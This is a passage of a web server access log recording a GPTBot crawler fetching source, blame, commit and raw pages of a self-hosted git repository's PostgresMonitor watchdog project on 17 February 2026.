AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:13:09:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs" [Client 74.7.227.38] [Length 10430] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:13:09:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/.gitignore" [Client 74.7.227.38] [Length 11836] [Gzip 5.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/.gitignore" -[17/Feb/2026:13:09:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/.gitignore" [Client 74.7.227.38] [Length 10137] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/.gitignore" -[17/Feb/2026:13:09:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/PostgresWatchdog.spec" [Client 74.7.227.38] [Length 12224] [Gzip 3.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/PostgresWatchdog.spec" -[17/Feb/2026:13:09:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" [Client 74.7.227.38] [Length 10947] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:13:09:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build" [Client 74.7.227.38] [Length 10136] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build" -[17/Feb/2026:13:09:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/PostgresWatchdog.spec" [Client 74.7.227.38] [Length 11372] [Gzip 5.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/PostgresWatchdog.spec" -[17/Feb/2026:13:09:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/watchdog.py" [Client 74.7.227.38] [Length 17738] [Gzip 9.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/watchdog.py" -[17/Feb/2026:13:09:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/dist" [Client 74.7.227.38] [Length 9917] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/dist" -[17/Feb/2026:13:09:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/watchdog.py" [Client 74.7.227.38] [Length 4806] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/watchdog.py" -[17/Feb/2026:13:09:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog" [Client 74.7.227.38] [Length 10713] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:13:09:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs" [Client 74.7.227.38] [Length 9964] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs" -[17/Feb/2026:13:09:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 10999] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs" -[17/Feb/2026:13:09:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 806] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/ReadMe.txt" -[17/Feb/2026:13:09:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/PostgresWatchdog.spec" [Client 74.7.227.38] [Length 673] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/PostgresWatchdog.spec" -[17/Feb/2026:13:09:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/PostgresWatchdog.spec" [Client 74.7.227.38] [Length 9910] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/PostgresWatchdog.spec" -[17/Feb/2026:13:09:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build" [Client 74.7.227.38] [Length 9834] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build" -[17/Feb/2026:13:09:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" [Client 74.7.227.38] [Length 9539] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" -[17/Feb/2026:13:09:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" [Client 74.7.227.38] [Length 8597989] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" -[17/Feb/2026:13:09:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/dist" [Client 74.7.227.38] [Length 9881] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/dist" -[17/Feb/2026:13:09:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" [Client 74.7.227.38] [Length 9956] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" -[17/Feb/2026:13:09:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog" [Client 74.7.227.38] [Length 9915] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:13:09:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs" [Client 74.7.227.38] [Length 10390] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:13:09:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 13036] [Gzip 6.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:13:09:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 1069] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:13:09:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 9979] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:13:09:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 11649] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/ReadMe.txt" -[17/Feb/2026:13:09:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build" [Client 74.7.227.38] [Length 9887] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build" -[17/Feb/2026:13:09:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" [Client 74.7.227.38] [Length 10912] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:13:09:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 10998] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs" -[17/Feb/2026:13:09:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/dist/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 10915] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/dist" -[17/Feb/2026:13:09:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 10998] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs" -[17/Feb/2026:13:09:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 10996] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs" -[17/Feb/2026:13:09:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs" [Client 74.7.227.38] [Length 9936] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs" -[17/Feb/2026:13:09:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 10963] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs" -[17/Feb/2026:13:09:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 10962] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs" -[17/Feb/2026:13:09:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 10965] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs" -[17/Feb/2026:13:09:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 10962] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs" -[17/Feb/2026:13:09:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/README.md" [Client 74.7.227.38] [Length 553] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/README.md" -[17/Feb/2026:13:09:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" [Client 74.7.227.38] [Length 9540] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" -[17/Feb/2026:13:09:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 48957] [Gzip 17.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:13:09:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/dist/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 9505] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/dist/PostgresWatchdog.exe" -[17/Feb/2026:13:09:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/dist/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 9940] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/dist/PostgresWatchdog.exe" -[17/Feb/2026:13:10:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" [Client 74.7.227.38] [Length 8597989] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" -[17/Feb/2026:13:10:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 18349] [Gzip 11.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:13:10:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 1069] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:13:10:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 48928] [Gzip 17.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:13:10:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 17153] [Gzip 9.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:13:10:03 +0000] - 200 200 - 